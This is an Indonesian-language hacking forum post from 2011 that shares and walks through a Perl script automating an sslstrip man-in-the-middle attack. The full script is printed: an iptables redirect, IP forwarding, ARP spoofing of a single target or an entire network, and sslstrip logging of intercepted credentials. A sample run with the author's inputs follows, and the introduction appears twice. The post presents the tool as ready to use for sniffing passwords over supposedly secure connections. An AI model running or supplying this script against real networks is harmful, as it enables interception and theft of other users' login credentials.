10-27-2011, 12:28 AM
abis training kmaren ttg sslstrip MITM attack (sniffing password over secure connection) jdi nyari semua yang ngebahas tentang sslstrip, eh nemu script perl buat ngejalanin secara auto.. tpi seperti biasa, saran ane mari kita pahami cara kerjanya....
buat yang pengen ke tkp tempat ane baca nih tutorial, silahkan ke :
sslstrip MITM attack
tools yg wajib ada biar script ini berfungsi :
Linux (ane pake BT 5 R1)
Ettercap (specifically etter.conf) <---- pasti ada di BT
X-term ( BT5 R1)
Arpspoof
SSLStrip <--- kl ini sesuai saran om zee ane download di http://www.thoughtcrime.org/software/ssl...0.2.tar.gz
Nmap ( BT 5 r1)
disini ane kasih nama auto_mitm.pl
boleh pake apa aja buat paste nih script
nasa@IBTeam:/pentest/nasa/tools/sniffing# nano auto_mitm.pl
stlh di paste save
nasa@IBTeam:/pentest/nasa/tools/sniffing# chmod +x auto_mitm.pl
trus jalanin pake command :
nasa@IBTeam:/pentest/nasa/tools/sniffing# perl auto_mitm.pl
ntar hasilnya seperti ini, yg pake tanda <-- berarti itu yag ane input.
########################################
You will have to uncomment iptables redirect.
Inside nano use ctrl+o to save your changes & ctrl+x to exit and continue the script.
Would you like to open /etc/etter.conf to uncomment iptables redirect? (y/n)
y <-- ( ngedit file etter.conf kl belum di uncomment)
########################################
Changing iptables to redirect traffic from port 80 to port 8080
########################################
Checking to make sure ip forwarding is enabled
0 <--- (ngecek ip forward udah aktif blm, ini hasilnya)
Does ip forward = 0? (y/n)
y <--- ( krn msh 0 ane jawab y, trus ganti 0 dengan 1 , save)
1
########################################
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 0.0.0.0 0.0.0.0 U 0 0 0 ppp0
10.64.64.64 0.0.0.0 255.255.255.255 UH 0 0 0 ppp0
What is the default gateway?
10.64.64.64 <--- (default gateway ane)
########################################
eth1 Link encap:Ethernet HWaddr 00:1d:7d:4b:25:f6
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:43 Base address:0x2000
eth2 Link encap:Ethernet HWaddr 00:08:a1:68:c7:9e
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:19 Base address:0xa000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:824 errors:0 dropped:0 overruns:0 frame:0
TX packets:824 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:128389 (128.3 KB) TX bytes:128389 (128.3 KB)
ppp0 Link encap
oint-to-Point Protocol
inet addr:10.162.159.172 P-t-P:10.64.64.64 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1440 Metric:1
RX packets:13817 errors:0 dropped:0 overruns:0 frame:0
TX packets:14766 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:11568238 (11.5 MB) TX bytes:2223037 (2.2 MB)
Which network interface would you like to use?
ppp0 <--- (interface yg ane pake, tpi ppp0 blm support )
########################################
ppp0 Link encapoint-to-Point Protocol
inet addr:10.162.159.172 P-t-P:10.64.64.64 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1440 Metric:1
RX packets:13823 errors:0 dropped:0 overruns:0 frame:0
TX packets:14770 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:11569670 (11.5 MB) TX bytes:2224883 (2.2 MB)
What is your IP address?
10.162.159.172 <--- (ip address ane)
########################################
Would you like to run an nmap scan of the network to find a target? (y/n)
n <--- ( make nmap buat scan jaringan, ane jawab aja no)
########################################
Do you want to spoof a specific target? (y/n)
n <--- (jawab y kl buat 1 target, kl buat semua jwab aja n)
########################################
Starting SSL Strip.
We have a few options for our parameters with SSL Strip.
Here are you options:
sniff all traffic, kill active sessions, log data (akl)
kill, log, and sniff only https traffic (kl)
log https traffic only(l)
akl <--- (ane pilih pilihan yang pertama)
Enter name of the log file, it has to end with '.log'? (ex: strip.log )
tes.log <--- ( nama buat log'y)
########################################
Do you want to start to follow the log file in real time? (y/n)
y <-- (y kl mo liat log secara realtime)
Starting to tail the sslstrip log file.
nah script'y berakhir d sini, tpi bkalan terbuka 3 xterm window
1. buat log'y
2. spoofing
3 window buat sslstrip
fiuhh, cape jg ngetiknya... hehehe
,
silahkan d comment y, Thx....
( break it a part and find out how this script work, may be you can improve it)
buat yang pengen ke tkp tempat ane baca nih tutorial, silahkan ke :
sslstrip MITM attack
tools yg wajib ada biar script ini berfungsi :
Linux (ane pake BT 5 R1)
Ettercap (specifically etter.conf) <---- pasti ada di BT
X-term ( BT5 R1)
Arpspoof
SSLStrip <--- kl ini sesuai saran om zee ane download di http://www.thoughtcrime.org/software/ssl...0.2.tar.gz
Nmap ( BT 5 r1)
disini ane kasih nama auto_mitm.pl
boleh pake apa aja buat paste nih script
nasa@IBTeam:/pentest/nasa/tools/sniffing# nano auto_mitm.pl
Code:
#! /usr/bin/perl -w
#########################################################################
# Script Created By:
# Cypherround
#
# Man In The Middle Attack
# IPtables + Arpspoof + SSLStrip
#
# http://cypherround.blogspot.com
#########################################################################
use strict;
use warnings;
# open /etc/etter.conf and uncomment
# iptables redirect on/off
# ctrl+o to save changes
# ctrl+x to exit nano and continue with script
my $tables;
print "########################################\n";
print "You will have to uncomment iptables redirect.\n";
print "Inside nano use ctrl+o to save your changes & ctrl+x to exit and continue the script.\n";
print "Would you like to open /etc/etter.conf to uncomment iptables redirect? (y/n)\n";
$tables=<STDIN>;
chomp($tables);
if ($tables eq "y"){
print "press ctrl+x to exit nano";
system ("sudo nano /etc/etter.conf");
}
# change iptables to allow redirection from port 80 to port 8080
my $redirect;
print "########################################\n";
print "Changing iptables to redirect traffic from port 80 to port 8080\n";
$redirect=`sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080`;
# check to make sure ip forwarding is enabled
my $forward;
print "########################################\n";
print "Checking to make sure ip forwarding is enabled\n";
system ("cat /proc/sys/net/ipv4/ip_forward");
print "Does ip forward = 0? (y/n)\n";
$forward=<STDIN>;
chomp($forward);
if ($forward eq "y"){
system ("sudo nano /proc/sys/net/ipv4/ip_forward");
system ("cat /proc/sys/net/ipv4/ip_forward");
}
# check to find out what the default gateway is
my $default;
print "########################################\n";
system ("netstat -nr");
print "What is the default gateway?\n";
$default=<STDIN>;
chomp($default);
# check which network interface device
my $interface;
print "########################################\n";
system ("ifconfig");
print "Which network interface would you like to use?\n";
$interface=<STDIN>;
chomp($interface);
# check what your ip address is
my $ip;
print "########################################\n";
system ("ifconfig $interface");
print "What is your IP address?\n";
$ip=<STDIN>;
chomp($ip);
# option to run nmap scan for a target
my $nmap;
my $netip;
print "########################################\n";
print "Would you like to run an nmap scan of the network to find a target? (y/n)\n";
$nmap=<STDIN>;
chomp($nmap);
if ($nmap eq "y"){
print "Enter the IP to scan then entire network (ex: 192.168.1.*)\n";
$netip=<STDIN>;
chomp($netip);
system ("nmap -v -PN $netip");
}
# start arpspoof; option to spoof a target or spoof the entire network
my $arp;
my $target;
print "########################################\n";
print "Do you want to spoof a specific target? (y/n)\n";
$arp=<STDIN>;
chomp($arp);
if ($arp eq "y"){
print "Enter the IP of the Target: \n";
$target=<STDIN>;
chomp($target);
system ("xterm -e sudo arpspoof -i $interface -t $target $default &");
}
else {
system ("xterm -e sudo arpspoof -i $interface $default &");
}
# start ssl strip
my $ssl;
my $log;
print "########################################\n";
print "Starting SSL Strip.\n";
print "We have a few options for our parameters with SSL Strip.\n";
print "Here are you options: \nsniff all traffic, kill active sessions, log data (akl) \nkill, log, and sniff only https traffic (kl) \nlog https traffic only(l)\n";
$ssl=<STDIN>;
chomp($ssl);
print "Enter name of the log file, it has to end with '.log'? (ex: strip.log )\n";
$log=<STDIN>;
chomp($log);
if ($ssl eq "akl"){
system ("xterm -e sudo sslstrip -a -k -l 8080 -w $log &");
}
if ($ssl eq "kl"){
system ("xterm -e sudo sslstrip -k -l 8080 -w $log &");
}
elsif ($ssl eq "l"){
system ("xterm -e sudo sslstrip -l 8080 -w $log &");
}
# start following the sslstrip log using tail
my $tail;
print "########################################\n";
print "Do you want to start to follow the log file in real time? (y/n)\n";
$tail=<STDIN>;
chomp($tail);
if ($tail eq "y"){
print "Starting to tail the sslstrip log file.\n";
system ("xterm -e sudo tail -f $log &");
}
else {
print "Script done. Time to wait.\n";
}stlh di paste save
nasa@IBTeam:/pentest/nasa/tools/sniffing# chmod +x auto_mitm.pl
trus jalanin pake command :
nasa@IBTeam:/pentest/nasa/tools/sniffing# perl auto_mitm.pl
ntar hasilnya seperti ini, yg pake tanda <-- berarti itu yag ane input.
########################################
You will have to uncomment iptables redirect.
Inside nano use ctrl+o to save your changes & ctrl+x to exit and continue the script.
Would you like to open /etc/etter.conf to uncomment iptables redirect? (y/n)
y <-- ( ngedit file etter.conf kl belum di uncomment)
########################################
Changing iptables to redirect traffic from port 80 to port 8080
########################################
Checking to make sure ip forwarding is enabled
0 <--- (ngecek ip forward udah aktif blm, ini hasilnya)
Does ip forward = 0? (y/n)
y <--- ( krn msh 0 ane jawab y, trus ganti 0 dengan 1 , save)
1
########################################
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 0.0.0.0 0.0.0.0 U 0 0 0 ppp0
10.64.64.64 0.0.0.0 255.255.255.255 UH 0 0 0 ppp0
What is the default gateway?
10.64.64.64 <--- (default gateway ane)
########################################
eth1 Link encap:Ethernet HWaddr 00:1d:7d:4b:25:f6
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:43 Base address:0x2000
eth2 Link encap:Ethernet HWaddr 00:08:a1:68:c7:9e
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:19 Base address:0xa000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:824 errors:0 dropped:0 overruns:0 frame:0
TX packets:824 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:128389 (128.3 KB) TX bytes:128389 (128.3 KB)
ppp0 Link encap
oint-to-Point Protocol inet addr:10.162.159.172 P-t-P:10.64.64.64 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1440 Metric:1
RX packets:13817 errors:0 dropped:0 overruns:0 frame:0
TX packets:14766 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:11568238 (11.5 MB) TX bytes:2223037 (2.2 MB)
Which network interface would you like to use?
ppp0 <--- (interface yg ane pake, tpi ppp0 blm support
)########################################
ppp0 Link encap
oint-to-Point Protocol inet addr:10.162.159.172 P-t-P:10.64.64.64 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1440 Metric:1
RX packets:13823 errors:0 dropped:0 overruns:0 frame:0
TX packets:14770 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:11569670 (11.5 MB) TX bytes:2224883 (2.2 MB)
What is your IP address?
10.162.159.172 <--- (ip address ane)
########################################
Would you like to run an nmap scan of the network to find a target? (y/n)
n <--- ( make nmap buat scan jaringan, ane jawab aja no)
########################################
Do you want to spoof a specific target? (y/n)
n <--- (jawab y kl buat 1 target, kl buat semua jwab aja n)
########################################
Starting SSL Strip.
We have a few options for our parameters with SSL Strip.
Here are you options:
sniff all traffic, kill active sessions, log data (akl)
kill, log, and sniff only https traffic (kl)
log https traffic only(l)
akl <--- (ane pilih pilihan yang pertama)
Enter name of the log file, it has to end with '.log'? (ex: strip.log )
tes.log <--- ( nama buat log'y)
########################################
Do you want to start to follow the log file in real time? (y/n)
y <-- (y kl mo liat log secara realtime)
Starting to tail the sslstrip log file.
nah script'y berakhir d sini, tpi bkalan terbuka 3 xterm window
1. buat log'y
2. spoofing
3 window buat sslstrip
fiuhh, cape jg ngetiknya... hehehe
,silahkan d comment y, Thx....
( break it a part and find out how this script work, may be you can improve it)
Hacking isn't just Computers & Exploits. It's a Philosophy.
